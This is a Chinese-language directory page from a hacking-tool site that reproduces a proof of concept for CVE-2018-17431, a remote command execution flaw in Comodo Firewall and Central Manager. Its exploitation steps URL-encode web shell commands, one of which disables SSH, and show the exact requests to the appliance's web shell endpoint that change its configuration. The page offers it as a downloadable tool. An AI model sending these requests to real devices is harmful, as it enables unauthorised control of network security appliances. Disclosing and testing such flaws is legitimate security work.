Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/sanan2004/cve-2018-17431-comodo
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHubsanan2004/cve-2018-17431-comodo

CVE-2018-17431-Comodo

Comodo

查看仓库
2年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-17431-PoC

CVE-2018-17431 概念验证

漏洞标题:Comodo Firewall & Central Manager (UTM) 所有 2.7.0 及 1.5.0 之前的版本远程命令执行(基于 Web Shell)

漏洞作者:Milad Fadavvi

厂商主页:https://www.comodo.com/

软件链接:https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276

版本:2.7.0 及 1.5.0 之前

测试环境:Windows:firefox/chrome - Kali:firefox

发现日期:2018-08-15(当天报告)

确认漏洞存在:2018-09-22(工单 ID: XWR-503-79437))

利用步骤:

  1. WebShell 模拟:

    root@kitploit:~
     For example disable SSH in web shell is like this:
         - service [hit enter]
         - ssh [hit enter]
         - disable [hit enter]
    
  2. 编码

    root@kitploit:~
     make above sequense encode with URL ECODING
     (I used burp encoder plugin)
    
     %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
    
  3. 执行

    root@kitploit:~
     Base URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
     
     
               https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (extra enter key for run the command)
               
    
     Example: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
     
           https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
    

页面将显示 "Configuration has been altered" 消息,并且配置已更改!

通过此技术,我们可以模拟所有 WebShell 命令。

下载工具